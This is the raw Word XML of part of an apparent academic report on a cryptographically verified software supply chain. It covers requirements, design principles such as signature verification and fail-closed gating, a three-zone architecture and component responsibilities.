          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Usability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: one command per step, clear reports, and exit codes that plug into any CI system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Maintainability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: modular vendor, distribution, customer and audit components; policy in JSON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.4 Hardware and Software Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Hardware and software requirements</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2381"/>
        <w:gridCol w:w="6577"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Requirement</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Processor / RAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Any x86-64 or ARM64 CPU; 4 GB RAM or more</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Operating system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Linux, macOS or Windows 10/11</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Language / runtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Python 3.10 or later</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Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PyCA </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cryptography</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Ed25519, X.509, ECDSA P-256 for TLS certificates, PKCS#8 encryption); </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hashlib</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> SHA-256; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ssl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (OpenSSL) TLS 1.3</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Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQLite 3 (audit log), JSON (manifests, trust policy, policies)</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Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>pytest; GitHub Actions workflow for CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Graphviz (diagrams), matplotlib (charts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>DESIGN AND IMPLEMENTATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This chapter presents the proposed security mechanism, the core of the work. Each component is described with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>what it does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>why it exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, that is, which vulnerability from Chapter 3 it removes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.1 Design Principles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Verify, don't trust the channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: the registry and network are assumed hostile, so trust comes only from signatures checked against a pinned root key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Integrity AND authenticity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: SHA-256 proves the bytes match; Ed25519 proves who approved them. Both are required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Separation of duties / least privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: storing or building an artifact does not grant the ability to release it; signing needs a role, MFA and a protected key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Defence in depth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: build-time security tests, signatures, key status, version policy, provenance and a customer-side content scan are independent layers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Fail closed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: any error, missing field or unverifiable item results in BLOCK, never in a silent deploy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Accountability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: every security-relevant action is written to a tamper-evident log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.2 Security Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3348000" cy="7763768"/>
            <wp:docPr id="3" name="Picture 3"/>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3348000" cy="7763768"/>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5.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Security architecture of the Cryptographically Verified Software Supply Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The architecture (Figure 5.1) has three trust zones. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vendor zone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains the developer, the protected source repository, an isolated CI build, security testing, SHA-256 and provenance generation, and the signing service (HSM/KMS concept) that emits the signed manifest. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>distribution zone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (artifact registry and TLS 1.3 channel) is treated as untrusted: it carries signed objects only. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>customer zone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> holds the pinned root public key, the verification engine and the security gate that decides DEPLOY or BLOCK. All zones write to the hash-chained audit log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.3 Component Responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Components and their security purpose</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2721"/>
        <w:gridCol w:w="3061"/>
        <w:gridCol w:w="3175"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Component (module)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security reason</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Secure build (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>vendor/build.py</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Security tests, packaging, SHA-256, provenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Malicious code is never signed; provenance ties the artifact to its source and builder</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Access control (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>vendor/access_control.py</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RBAC roles and TOTP MFA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A leaked token or password cannot obtain a signature (fixes V1/V2)</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Signing service (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>vendor/sign.py</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Only component that loads private keys; signs artifact and manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mirrors an HSM/KMS Sign API; keys never leave</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Key manager (</w:t>
            </w:r>
